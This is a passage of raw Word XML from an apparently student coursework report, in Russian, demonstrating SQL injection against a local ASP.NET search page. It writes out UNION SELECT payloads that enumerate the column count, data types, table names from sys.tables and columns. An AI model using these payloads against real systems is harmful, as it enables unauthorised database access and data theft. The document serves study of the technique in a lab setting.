          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> то срабатывает запрос "</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2951">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">". </w:t>
      </w:r>
      <w:r w:rsidR="00546FBD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Таким образом</w:t>
      </w:r>
      <w:r w:rsidR="004E6BC2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00546FBD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>мы получили все данные из текущей таблицы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF7C2C" w:rsidRDefault="00546FBD" w:rsidP="00BF7C2C">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lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2779810" cy="3039854"/>
            <wp:effectExtent l="19050" t="0" r="1490" b="0"/>
            <wp:docPr id="1"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10" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2786261" cy="3046909"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00546FB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899078" cy="3161894"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Рисунок 2" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx2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2 - Google Chrome.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2902578" cy="3165711"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C250C0" w:rsidRPr="00BF7C2C" w:rsidRDefault="00546FBD" w:rsidP="004E6BC2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="70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AF3055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее определяем количество </w:t>
      </w:r>
      <w:r w:rsidR="00AF3055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>аргументов</w:t>
      </w:r>
      <w:r w:rsidR="00AF3055" w:rsidRPr="00AF3055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и их тип данных.</w:t>
      </w:r>
      <w:r w:rsidR="00AF3055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для этого воспользуемся простым </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Union</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00AF3055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> оператором. Перебором мы определили, что их количество равно 4 и типы данных в sql-запросе соответственно </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rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AF3055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</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datetime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AF3055" w:rsidRPr="00AF3055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AF3055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF3055" w:rsidRPr="00AF3055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C250C0" w:rsidRPr="008F0DA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Пример этого запроса </w:t>
      </w:r>
      <w:r w:rsidR="00C250C0" w:rsidRPr="00C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>для поиска точно по слову и частично</w:t>
      </w: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C250C0" w:rsidRPr="00C250C0" w:rsidRDefault="00AF3055"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C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> select 1,'</w:t>
      </w:r>
      <w:r w:rsidR="00C250C0" w:rsidRPr="00C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ничего</w:t>
      </w:r>
      <w:r w:rsidRPr="00C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>','</w:t>
      </w:r>
      <w:r w:rsidR="00C250C0" w:rsidRPr="00C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ничего</w:t>
      </w:r>
      <w:r w:rsidRPr="00C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>',1--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C250C0" w:rsidRPr="00C250C0" w:rsidRDefault="00C250C0"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C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> select 1,'Ничего', 'Ничего',1--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C250C0" w:rsidRDefault="00C250C0" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00546FB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 не выдал никаких ошибок и вывел нужные нам данные.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF3055" w:rsidRPr="00AF3055" w:rsidRDefault="00C250C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18349" cy="2070457"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Рисунок 4" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx6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ергей\Desktop\Скрины для курсововй\localhost25244Default.aspx6 - Google Chrome.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3023161" cy="2073758"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00C250C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3917" cy="2067339"/>
            <wp:effectExtent l="19050" t="0" r="2183" b="0"/>
            <wp:docPr id="5" name="Рисунок 5" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx7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ергей\Desktop\Скрины для курсововй\localhost25244Default.aspx7 - Google Chrome.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3085336" cy="2068290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E2951" w:rsidRPr="008E2951" w:rsidRDefault="008E2951" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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8B701A" w:rsidRPr="008B701A" w:rsidRDefault="00C250C0" w:rsidP="004E6BC2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее мы выводим </w:t>
      </w:r>
      <w:r w:rsidRPr="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">все </w:t>
      </w:r>
      <w:r w:rsidR="00A852C0" w:rsidRPr="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>имена таблиц</w:t>
      </w:r>
      <w:r w:rsidRPr="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> созданных</w:t>
      </w:r>
      <w:r w:rsidRPr="00C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> администратором</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> с помощью</w:t>
      </w:r>
      <w:r w:rsidR="008B701A" w:rsidRPr="008B701A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> одного из </w:t>
      </w:r>
      <w:r w:rsidR="008B701A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>следующих</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> запрос</w:t>
      </w:r>
      <w:r w:rsidR="008B701A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B701A" w:rsidRPr="008B701A" w:rsidRDefault="008B701A" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C250C0" w:rsidRPr="00C82EC8" w:rsidRDefault="00C82EC8"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w:t>
      </w:r>
      <w:r w:rsidR="008B701A" w:rsidRPr="008B701A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and '1' = '2' </w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Union  </w:t>
      </w:r>
      <w:r w:rsidR="008B701A" w:rsidRPr="008B701A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> select 1, name, '</w:t>
      </w:r>
      <w:r w:rsidR="008B701A" w:rsidRPr="008B701A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ничего</w:t>
      </w:r>
      <w:r w:rsidR="008B701A" w:rsidRPr="008B701A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">',1 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B701A" w:rsidRPr="008B701A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B701A" w:rsidRPr="008B701A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B701A" w:rsidRPr="008B701A" w:rsidRDefault="008B701A"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8B701A">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8B701A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> select 1, name, 'Ничего',1 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B701A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B701A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B701A" w:rsidRDefault="008B701A"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902226" cy="2218003"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Рисунок 7" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx8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Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx8 - Google Chrome.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2905415" cy="222044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3047889" cy="2361537"/>
            <wp:effectExtent l="19050" t="0" r="111" b="0"/>
            <wp:docPr id="8" name="Рисунок 8" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx10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Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx10 - Google Chrome.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3051552" cy="2364375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C82EC8" w:rsidRDefault="00C82EC8" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C82EC8" w:rsidRPr="008F0DAD" w:rsidRDefault="00C82EC8" w:rsidP="004E6BC2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C82EC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Можно вывести все таблицы и соответствующие им колонки при помощи одного из следующих запросов:</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C82EC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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C82EC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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43420" cy="2649190"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Рисунок 9"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Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2844668" cy="2650353"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00C82EC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1959" cy="2831530"/>
            <wp:effectExtent l="19050" t="0" r="4141" b="0"/>
            <wp:docPr id="10" name="Рисунок 10"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ергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3085731" cy="2834996"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C82EC8" w:rsidRDefault="00417CBE" w:rsidP="004E6BC2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00417CBE">
        <w:rPr>
